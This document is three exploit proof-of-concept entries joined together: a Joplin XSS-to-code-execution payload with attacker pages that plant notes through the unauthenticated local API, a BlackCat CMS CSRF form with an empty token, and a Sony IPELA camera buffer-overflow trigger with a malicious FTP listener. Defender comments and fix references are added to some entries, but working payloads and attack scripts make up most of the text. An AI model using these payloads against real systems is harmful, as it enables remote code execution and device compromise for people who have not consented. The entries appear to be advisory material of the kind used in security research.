# Tested on: Windows / Linux
# CVE : CVE-2020-15930
# References:
# https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff
# 1. Technical Details
# An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag.
# HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE.
# If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application.
# 2. PoC
# Paste the following payload into a note:
<embed src="data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)</script>">
# 2.1 RCE with user interaction
# Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit.
# By default, notes are stored in the last notebook created.
<!-- exploit.html -->
<script>
// Runs in the attacker's page. In the affected versions the local Joplin
// API on 127.0.0.1:41184 accepts POST /notes without a token (see the
// description above), so a cross-origin request is enough to plant a note
// whose body carries the embed payload; it runs when the victim opens it.
x = new XMLHttpRequest;
j = {
    title: "CVE-2020-15930",
    body: "<embed src='data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)<\/script>'>"
};
x.open("POST", "http://127.0.0.1:41184/notes");
x.send(JSON.stringify(j));
</script>
# To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint.
<!-- notebooks.html -->
<script>
// notebooks.html (advisory PoC): cross-origin GET of the victim's notebook list.
// Reading responseText succeeds only if the API's CORS policy lets this page's origin
// read the response (the "relaxed CORS policy" noted above; the actual response
// headers are not shown here).
// Defender notes: restrict Access-Control-Allow-Origin on the local API and require a
// token on every endpoint, not only on writes; an unauthenticated read endpoint leaks
// the identifiers a write endpoint then needs.
x = new XMLHttpRequest();
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
alert(x.responseText);  // demo sink: displays the raw response body
}
}
x.open('GET', 'http://127.0.0.1:41184/folders');
x.send();
</script>
# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Date: 2020-06-01
# Exploit Author: Noth
# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
# Version: v1.3.6
# CVE : CVE-2020-25453
BlackCat CMS v1.3.6 has a CSRF vulnerability (the csrf_token check can be bypassed) that
allows remote arbitrary code execution.
PoC (remove the csrf_token value):
<input type=“hidden” name=“__csrf_magic” value=“”/>
-------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<!-- Advisory PoC: a cross-site form posting to the BlackCat CMS backend login endpoint
     with an empty __csrf_magic value, demonstrating that the server-side check accepts
     a missing/empty token. The username/password field names carry suffixes
     (username_274807982ed4, password_75868428f837) that look per-form generated; the
     PoC assumes they are reusable across requests -- verify against the target version.
     Mitigation: reject the request outright when the token is absent or empty, compare
     it in constant time against the value bound to the user's session, and add
     SameSite cookies plus an Origin/Referer check as defense in depth. -->
<body>
<script>history.pushState(",",'/')</script>
<form action=“
http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php
”method=“POST”>
<input type=“hidden” name=“__csrf_magic” value=“”/>
<input type=“hidden” name=“username_fieldname”
value=“username_274807982ed4”/>
<input type=“hidden” name=“password_fieldname”
value=“password_75868428f837”/>
<input type=“hidden” name=“_cat_ajax” value=“1”/>
<input type=“hidden” name=“username_274807982ed4” value=“accountname”/>
<input type=“hidden” name=“password_75868428f837” value=“yourpassword”/>
<input type=“submit” value=“Submit request”/>
</form>
</body>
</html>
# Exploit Title: Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow
# Google Dork: Server: Mida eFramework
# Date: 2020-09-30
# Exploit Author: LiquidWorm
# Vendor Homepage: https://pro.sony
# Version: <= 1.82.01
#!/usr/bin/env python
#
#
# Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow
#
#
# Vendor: Sony Electronics Inc.
# Product web page: https://pro.sony
# Affected version: SNC-DH120T v1.82.01
#
#
# Summary: IPELA is Sony's vision of the ultimate workplace, designed to revolutionize
# the way business communicates over global IP networks. IPELA products can improve the
# efficiency of your organization by connecting people and places with high-quality audio
# and video. The SNC-DH120T is an indoor tamper proof, high definition (720p) minidome
# network security camera with Electronic Day/Night settings, DEPA analysis and is ONVIF
# compliant. It supports dual streaming of H.264, MPEG-4 and JPEG at full frame-rate.
#
# Desc: The vulnerability is caused by a boundary error in the processing of received
# FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited
# to cause a stack-based buffer overflow when a user issues a POST request to connect to a
# malicious FTP server. Successful exploitation could allow execution of arbitrary code on
# the affected device or cause a denial of service scenario.
#
# Tested on: gen5th/1.x
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5596
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php
# Fixed in 1.88.0.0: https://pro.sony/en_NL/support-resources/snc-dh120/software/mpengb00000928
#
#
# 28.10.2019
#
# PoC:
# Trigger:
# curl 'http://10.0.0.3:5080/command/ftpclient.cgi' \
# -H 'Connection: keep-alive' \
# -H 'Cache-Control: max-age=0' \
# -H 'Authorization: Basic YWRtaW46YWRtaW4=' \
# -H 'Upgrade-Insecure-Requests: 1' \
# -H 'Origin: http://10.0.0.3:5080' \
# -H 'Content-Type: application/x-www-form-urlencoded' \
# -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36' \
# -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
# -H 'Referer: http://81.83.17.200:5080/en/l4/ftp/common.html' \
# -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
# --data 'FtpClientFunc=on&FcServerName=10.0.0.5&FcUserName=EVIL&FcPassword=NONESO&FcPassive=off&reload=referer' \
# --compressed \
# --insecure
#
#
# Observed fixed version log:
# 2020-07-27 17:48:03 FTP client Unexpected error occurred during FTP client operation.
#
import socket
# Advisory PoC: a minimal TCP listener standing in for the "malicious FTP server" named
# in the description above. It never speaks real FTP: after accepting one connection it
# answers every received chunk with a single ~111 KB line; presumably that oversized
# response line is what triggers the stack-based overflow described above when the
# camera's FTP client (ftpclient.cgi) is pointed at this host.
#
# Defender notes (grounded in the advisory header above):
# - The trigger is an HTTP POST to /command/ftpclient.cgi carrying an Authorization
#   header, so an attacker needs camera admin credentials or must lure an admin into
#   submitting that request; keep the admin interface off untrusted networks.
# - Fixed in firmware 1.88.0.0 (see the "Fixed in" link above); updating is the fix.
#   Until then, restrict the camera's outbound FTP destinations to trusted servers.
# - Detection: an FTP control-channel reply of 100,000+ bytes before a newline is not
#   legitimate FTP and can be flagged at an egress proxy; on the fixed firmware the
#   device logs "FTP client Unexpected error occurred during FTP client operation"
#   (quoted above) when it meets such a response.
# - Python 2 syntax (print statement); this does not run under Python 3 as written.
HOST = '127.0.0.1' # 10.0.0.5  -- must match the FcServerName value in the trigger request
PORT = 21  # standard FTP control port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)  # backlog of one: a single connection from the camera is expected
conn, addr = s.accept()  # blocks until the camera's FTP client connects
print 'Connection from', addr
while True:
data = conn.recv(1024)
if not data:
break
# 100000 'A' + 10000 'B' + 1000 'C' = 111,000 bytes, sent as one newline-terminated line
evil = "A" * 100000
evil += "B" * 10000
evil += "C" * 1000
conn.sendall(evil+'\n')
# NOTE(review): conn is never closed; only the listening socket is released here.
s.close()